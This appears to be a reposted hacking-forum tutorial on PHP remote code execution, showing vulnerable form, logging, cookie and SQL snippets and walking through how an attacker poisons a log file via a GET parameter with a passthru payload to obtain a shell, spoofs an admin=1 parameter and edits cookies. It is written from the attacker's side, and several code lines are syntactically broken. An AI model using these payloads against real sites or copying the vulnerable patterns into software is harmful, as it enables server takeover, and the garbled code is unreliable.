We will be taking a look at a php form that submits data from a form in submit.php
Code:
<form method="POST" action=""> <textarea rows="10" name="comments" cols="60"></textarea> <p><input type="submit" value="Post" name="sub"></p> </form>
Code:
<?php $comments = $_POST['comments']; $log = fopen(-'comments.php','a'); fwrite($log,'<br />'.'<br />.'<center>'.'Comments::'.'<br />'.$comments); fclose($log); ?>
This exploit allows us to execute our own code, which is extremely awesome, for lack of a better term.. We can use it to get server details using phpinfo(), or a shell, or pretty much, anything :P
We can use a get request to display an error message, and log the IP with the specific message, which is a common vulnerability.
Okay, so lets assume that info.php has the code:
Code:
<?php $msg = $_GET['msg']; $ip = getenv('REMOTE_ADDR'); $error = fopen('errorlog.php','a'); fwrite($error,'<br />'.$msg.'<br />'.$ip.'<br />'); fclose($error); ?>
This will allow a remote attacker (you) to poison the log file, and inject malicious code. I will also highlight another type of remote code execution, which is cookie poisoning.
Code:
<?php require("config.php"); if(!isset($_COOKIE['admin'])) {header("Location:admin.php?user=admin"); } ?>
Another example that does relitivly the same thing. It uses a GET request to check a users status
Code:
$admin = $_GET['admin']; if(!isset($admin == 1)){ $queryxyz = "SELECT * from user where username='$admin'"; header("Location:admin/admin.php"); }
admin = 1 ;) The query is giving us another possible vulnerability... SQL Injection.
RCE is also possible through headers deposition or an arbitrary file upoad if there is a file processing system, and is not sanitized.
How can an attacker take advantage of this vulnerability and exploit it?
I guess I'll tell you.
So, lets say that a hacker hears that a GET variable has been implimented in order to log specific data to that file. So, now us, the hackers, will want to try and locate the log file. Path arrays are used by the attacker for sucessfull exploitation. Then, we will inject some malicious code to check if its filtering the output. For our example, we will assume its not. So, we are really lucky, and should try and spawn a shell. Well, this is how we would do that.
http://www.example.com/info.php?msg=<? passthru(&_get('attacker']); ?>
That will poison the logfile, and inject a vulnerable piece of code which can later be exploitan and be used for RFI to get a shell on. Probably somewhere like:
http://www.example.com/errorlog.php?attacker=Mulci? (mulci is my shell)
In some other cases, like: "if(!isset($admin == 1)" could also be exploited easily. The attacker would just have to spoof the variable admin. http://www.example.com/file.php?admin=1
Same thing for the cookies, just have to edit the cookie.
Nguồn: http://forum.intern0t.org/web-hacking-war-games/2924-remote-code-execution.html